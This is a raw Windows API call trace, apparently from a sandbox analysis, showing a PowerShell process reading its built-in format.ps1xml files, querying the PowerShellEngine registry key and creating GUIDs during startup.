	[0505.481] SetErrorMode (uMode=0x1) returned 0x1
	[0505.481] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x14d3a0 | out: lpFileInformation=0x14d3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0505.481] SetErrorMode (uMode=0x1) returned 0x1
	[0505.481] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14d190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0505.481] SetErrorMode (uMode=0x1) returned 0x1
	[0505.481] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x14d3a0 | out: lpFileInformation=0x14d3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e0582f, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e0582f, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e29f95, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1
	[0505.481] SetErrorMode (uMode=0x1) returned 0x1
	[0505.481] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14d190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0505.481] SetErrorMode (uMode=0x1) returned 0x1
	[0505.481] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x14d3a0 | out: lpFileInformation=0x14d3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e2b98c, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e2b98c, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e76251, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1
	[0505.482] SetErrorMode (uMode=0x1) returned 0x1
	[0505.482] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14d190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0505.482] SetErrorMode (uMode=0x1) returned 0x1
	[0505.482] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x14d3a0 | out: lpFileInformation=0x14d3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e51ae9, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e51ae9, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e9c3af, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1
	[0505.482] SetErrorMode (uMode=0x1) returned 0x1
	[0505.482] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14d190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0505.482] SetErrorMode (uMode=0x1) returned 0x1
	[0505.482] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x14d3a0 | out: lpFileInformation=0x14d3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e9dda3, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e9dda3, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1
	[0505.482] SetErrorMode (uMode=0x1) returned 0x1
	[0505.482] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14d190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0505.483] SetErrorMode (uMode=0x1) returned 0x1
	[0505.483] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x14d3a0 | out: lpFileInformation=0x14d3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1
	[0505.483] SetErrorMode (uMode=0x1) returned 0x1
	[0505.483] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14d190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0505.483] SetErrorMode (uMode=0x1) returned 0x1
	[0505.483] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x14d3a0 | out: lpFileInformation=0x14d3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe603f2b9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1
	[0505.483] SetErrorMode (uMode=0x1) returned 0x1
	[0505.485] CoTaskMemAlloc (cb=0x104) returned 0x3ada70
	[0505.485] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3ada70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0505.485] CoTaskMemFree (pv=0x3ada70) 
	[0505.966] CoTaskMemAlloc (cb=0x104) returned 0x3ada70
	[0505.966] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3ada70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0505.966] CoTaskMemFree (pv=0x3ada70) 
	[0505.966] CoTaskMemAlloc (cb=0x104) returned 0x3ada70
	[0505.966] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3ada70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0505.966] CoTaskMemFree (pv=0x3ada70) 
	[0505.967] CoTaskMemAlloc (cb=0x104) returned 0x3ada70
	[0505.967] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3ada70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0505.967] CoTaskMemFree (pv=0x3ada70) 
	[0505.968] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2f8
	[0505.968] GetFileType (hFile=0x2f8) returned 0x1
	[0505.968] SetErrorMode (uMode=0x1) returned 0x1
	[0505.968] GetFileType (hFile=0x2f8) returned 0x1
	[0505.969] ReadFile (in: hFile=0x2f8, lpBuffer=0x32aa140, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d038, lpOverlapped=0x0 | out: lpBuffer=0x32aa140*, lpNumberOfBytesRead=0x14d038*=0x1000, lpOverlapped=0x0) returned 1
	[0505.973] ReadFile (in: hFile=0x2f8, lpBuffer=0x32aa140, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d038, lpOverlapped=0x0 | out: lpBuffer=0x32aa140*, lpNumberOfBytesRead=0x14d038*=0x1000, lpOverlapped=0x0) returned 1
	[0505.974] ReadFile (in: hFile=0x2f8, lpBuffer=0x32aa140, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d038, lpOverlapped=0x0 | out: lpBuffer=0x32aa140*, lpNumberOfBytesRead=0x14d038*=0x1000, lpOverlapped=0x0) returned 1
	[0505.975] ReadFile (in: hFile=0x2f8, lpBuffer=0x32aa140, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d038, lpOverlapped=0x0 | out: lpBuffer=0x32aa140*, lpNumberOfBytesRead=0x14d038*=0x1000, lpOverlapped=0x0) returned 1
	[0505.975] ReadFile (in: hFile=0x2f8, lpBuffer=0x32aa140, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d038, lpOverlapped=0x0 | out: lpBuffer=0x32aa140*, lpNumberOfBytesRead=0x14d038*=0x1000, lpOverlapped=0x0) returned 1
	[0505.975] ReadFile (in: hFile=0x2f8, lpBuffer=0x32aa140, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d038, lpOverlapped=0x0 | out: lpBuffer=0x32aa140*, lpNumberOfBytesRead=0x14d038*=0x1000, lpOverlapped=0x0) returned 1
	[0505.975] ReadFile (in: hFile=0x2f8, lpBuffer=0x32aa140, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d038, lpOverlapped=0x0 | out: lpBuffer=0x32aa140*, lpNumberOfBytesRead=0x14d038*=0x9e2, lpOverlapped=0x0) returned 1
	[0505.976] ReadFile (in: hFile=0x2f8, lpBuffer=0x32a968a, nNumberOfBytesToRead=0x21e, lpNumberOfBytesRead=0x14d038, lpOverlapped=0x0 | out: lpBuffer=0x32a968a*, lpNumberOfBytesRead=0x14d038*=0x0, lpOverlapped=0x0) returned 1
	[0505.976] ReadFile (in: hFile=0x2f8, lpBuffer=0x32aa140, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d038, lpOverlapped=0x0 | out: lpBuffer=0x32aa140*, lpNumberOfBytesRead=0x14d038*=0x0, lpOverlapped=0x0) returned 1
	[0505.976] CloseHandle (hObject=0x2f8) returned 1
	[0505.976] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x14cd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0505.976] SetErrorMode (uMode=0x1) returned 0x1
	[0505.976] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x14cfe0 | out: lpFileInformation=0x14cfe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1
	[0505.976] SetErrorMode (uMode=0x1) returned 0x1
	[0505.976] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x14cd10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0505.977] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d0c8 | out: phkResult=0x14d0c8*=0x2f8) returned 0x0
	[0505.977] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14d04c, lpData=0x0, lpcbData=0x14d048*=0x0 | out: lpType=0x14d04c*=0x1, lpData=0x0, lpcbData=0x14d048*=0x56) returned 0x0
	[0505.977] CoTaskMemAlloc (cb=0x5a) returned 0x1b959230
	[0505.977] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14d01c, lpData=0x1b959230, lpcbData=0x14d018*=0x56 | out: lpType=0x14d01c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x14d018*=0x56) returned 0x0
	[0505.977] CoTaskMemFree (pv=0x1b959230) 
	[0505.981] RegCloseKey (hKey=0x2f8) returned 0x0
	[0505.981] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x14cd10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0505.981] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x14cbc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0505.992] CoCreateGuid (in: pguid=0x14d2f0 | out: pguid=0x14d2f0*(Data1=0xc15a45e6, Data2=0xccd3, Data3=0x4765, Data4=([0]=0x99, [1]=0xf7, [2]=0x45, [3]=0xa2, [4]=0xa2, [5]=0xb7, [6]=0x96, [7]=0xa0))) returned 0x0
	[0506.015] CoCreateGuid (in: pguid=0x14d2f0 | out: pguid=0x14d2f0*(Data1=0xb356abfd, Data2=0x9dbf, Data3=0x4b67, Data4=([0]=0xbd, [1]=0x7b, [2]=0xa2, [3]=0xbf, [4]=0xeb, [5]=0x16, [6]=0x7d, [7]=0x83))) returned 0x0
	[0506.017] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2f8
	[0506.017] GetFileType (hFile=0x2f8) returned 0x1
	[0506.017] SetErrorMode (uMode=0x1) returned 0x1
	[0506.017] GetFileType (hFile=0x2f8) returned 0x1
	[0506.017] ReadFile (in: hFile=0x2f8, lpBuffer=0x32d4ca8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d038, lpOverlapped=0x0 | out: lpBuffer=0x32d4ca8*, lpNumberOfBytesRead=0x14d038*=0x1000, lpOverlapped=0x0) returned 1
	[0506.018] ReadFile (in: hFile=0x2f8, lpBuffer=0x32d4ca8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d038, lpOverlapped=0x0 | out: lpBuffer=0x32d4ca8*, lpNumberOfBytesRead=0x14d038*=0x1000, lpOverlapped=0x0) returned 1
	[0506.019] ReadFile (in: hFile=0x2f8, lpBuffer=0x32d4ca8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d038, lpOverlapped=0x0 | out: lpBuffer=0x32d4ca8*, lpNumberOfBytesRead=0x14d038*=0x1000, lpOverlapped=0x0) returned 1
	[0506.019] ReadFile (in: hFile=0x2f8, lpBuffer=0x32d4ca8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d038, lpOverlapped=0x0 | out: lpBuffer=0x32d4ca8*, lpNumberOfBytesRead=0x14d038*=0x1000, lpOverlapped=0x0) returned 1
	[0506.019] ReadFile (in: hFile=0x2f8, lpBuffer=0x32d4ca8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d038, lpOverlapped=0x0 | out: lpBuffer=0x32d4ca8*, lpNumberOfBytesRead=0x14d038*=0x1000, lpOverlapped=0x0) returned 1
	[0506.020] ReadFile (in: hFile=0x2f8, lpBuffer=0x32d4ca8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d038, lpOverlapped=0x0 | out: lpBuffer=0x32d4ca8*, lpNumberOfBytesRead=0x14d038*=0xfb2, lpOverlapped=0x0) returned 1
	[0506.020] ReadFile (in: hFile=0x2f8, lpBuffer=0x32d43c2, nNumberOfBytesToRead=0x4e, lpNumberOfBytesRead=0x14d038, lpOverlapped=0x0 | out: lpBuffer=0x32d43c2*, lpNumberOfBytesRead=0x14d038*=0x0, lpOverlapped=0x0) returned 1
	[0506.020] ReadFile (in: hFile=0x2f8, lpBuffer=0x32d4ca8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d038, lpOverlapped=0x0 | out: lpBuffer=0x32d4ca8*, lpNumberOfBytesRead=0x14d038*=0x0, lpOverlapped=0x0) returned 1
	[0506.020] CloseHandle (hObject=0x2f8) returned 1
	[0506.020] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14cd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0506.021] SetErrorMode (uMode=0x1) returned 0x1
	[0506.021] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x14cfe0 | out: lpFileInformation=0x14cfe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
	[0506.021] SetErrorMode (uMode=0x1) returned 0x1
	[0506.021] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14cd10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0506.021] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d0c8 | out: phkResult=0x14d0c8*=0x2f8) returned 0x0
	[0506.021] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14d04c, lpData=0x0, lpcbData=0x14d048*=0x0 | out: lpType=0x14d04c*=0x1, lpData=0x0, lpcbData=0x14d048*=0x56) returned 0x0
	[0506.021] CoTaskMemAlloc (cb=0x5a) returned 0x1b959230
	[0506.021] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14d01c, lpData=0x1b959230, lpcbData=0x14d018*=0x56 | out: lpType=0x14d01c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x14d018*=0x56) returned 0x0
	[0506.711] CoTaskMemFree (pv=0x1b959230) 
	[0506.712] RegCloseKey (hKey=0x2f8) returned 0x0
	[0506.712] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14cd10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0506.712] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14cbc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0506.713] CoCreateGuid (in: pguid=0x14d2f0 | out: pguid=0x14d2f0*(Data1=0x61fdd478, Data2=0x2be5, Data3=0x4047, Data4=([0]=0x93, [1]=0x70, [2]=0xdd, [3]=0x17, [4]=0xc3, [5]=0x1f, [6]=0x7b, [7]=0x77))) returned 0x0
	[0506.715] CoCreateGuid (in: pguid=0x14d2f0 | out: pguid=0x14d2f0*(Data1=0x72835b4a, Data2=0x5d4f, Data3=0x44c0, Data4=([0]=0xaf, [1]=0xeb, [2]=0xc6, [3]=0x28, [4]=0x7b, [5]=0x7, [6]=0x98, [7]=0xc9))) returned 0x0
	[0506.716] CoCreateGuid (in: pguid=0x14d2f0 | out: pguid=0x14d2f0*(Data1=0x14378cd3, Data2=0xfec1, Data3=0x45c0, Data4=([0]=0xbb, [1]=0x7c, [2]=0xe2, [3]=0x20, [4]=0x50, [5]=0x21, [6]=0xbc, [7]=0x6b))) returned 0x0
	[0506.716] CoCreateGuid (in: pguid=0x14d2f0 | out: pguid=0x14d2f0*(Data1=0x902b7725, Data2=0x4b65, Data3=0x43d6, Data4=([0]=0x9e, [1]=0xa0, [2]=0x33, [3]=0xb3, [4]=0x9f, [5]=0xcc, [6]=0x8, [7]=0x5f))) returned 0x0
	[0506.716] CoCreateGuid (in: pguid=0x14d2f0 | out: pguid=0x14d2f0*(Data1=0x47b7b0b8, Data2=0x5ef1, Data3=0x47bd, Data4=([0]=0x9f, [1]=0x9f, [2]=0xa, [3]=0xcc, [4]=0xc7, [5]=0x14, [6]=0xc1, [7]=0x77))) returned 0x0
	[0506.716] CoCreateGuid (in: pguid=0x14d2f0 | out: pguid=0x14d2f0*(Data1=0x7092766f, Data2=0xe2a2, Data3=0x46fd, Data4=([0]=0xa7, [1]=0xa1, [2]=0xef, [3]=0x4a, [4]=0xc9, [5]=0x36, [6]=0x29, [7]=0xee))) returned 0x0
	[0506.716] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2f8
	[0506.716] GetFileType (hFile=0x2f8) returned 0x1
	[0506.716] SetErrorMode (uMode=0x1) returned 0x1
	[0506.717] GetFileType (hFile=0x2f8) returned 0x1
	[0506.717] ReadFile (in: hFile=0x2f8, lpBuffer=0x3320a08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d038, lpOverlapped=0x0 | out: lpBuffer=0x3320a08*, lpNumberOfBytesRead=0x14d038*=0x1000, lpOverlapped=0x0) returned 1
	[0506.718] ReadFile (in: hFile=0x2f8, lpBuffer=0x3320a08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d038, lpOverlapped=0x0 | out: lpBuffer=0x3320a08*, lpNumberOfBytesRead=0x14d038*=0x1000, lpOverlapped=0x0) returned 1
	[0506.718] ReadFile (in: hFile=0x2f8, lpBuffer=0x3320a08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d038, lpOverlapped=0x0 | out: lpBuffer=0x3320a08*, lpNumberOfBytesRead=0x14d038*=0x1000, lpOverlapped=0x0) returned 1
	[0506.718] ReadFile (in: hFile=0x2f8, lpBuffer=0x3320a08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d038, lpOverlapped=0x0 | out: lpBuffer=0x3320a08*, lpNumberOfBytesRead=0x14d038*=0x1000, lpOverlapped=0x0) returned 1
	[0506.719] ReadFile (in: hFile=0x2f8, lpBuffer=0x3320a08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d038, lpOverlapped=0x0 | out: lpBuffer=0x3320a08*, lpNumberOfBytesRead=0x14d038*=0x1000, lpOverlapped=0x0) returned 1
	[0506.719] ReadFile (in: hFile=0x2f8, lpBuffer=0x3320a08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d038, lpOverlapped=0x0 | out: lpBuffer=0x3320a08*, lpNumberOfBytesRead=0x14d038*=0x1000, lpOverlapped=0x0) returned 1
	[0506.719] ReadFile (in: hFile=0x2f8, lpBuffer=0x3320a08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d038, lpOverlapped=0x0 | out: lpBuffer=0x3320a08*, lpNumberOfBytesRead=0x14d038*=0xaca, lpOverlapped=0x0) returned 1
	[0506.720] ReadFile (in: hFile=0x2f8, lpBuffer=0x332003a, nNumberOfBytesToRead=0x136, lpNumberOfBytesRead=0x14d038, lpOverlapped=0x0 | out: lpBuffer=0x332003a*, lpNumberOfBytesRead=0x14d038*=0x0, lpOverlapped=0x0) returned 1
	[0506.720] ReadFile (in: hFile=0x2f8, lpBuffer=0x3320a08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d038, lpOverlapped=0x0 | out: lpBuffer=0x3320a08*, lpNumberOfBytesRead=0x14d038*=0x0, lpOverlapped=0x0) returned 1
	[0506.720] CloseHandle (hObject=0x2f8) returned 1
	[0506.720] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14cd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0506.720] SetErrorMode (uMode=0x1) returned 0x1
	[0506.720] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x14cfe0 | out: lpFileInformation=0x14cfe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0506.720] SetErrorMode (uMode=0x1) returned 0x1
	[0506.721] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14cd10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
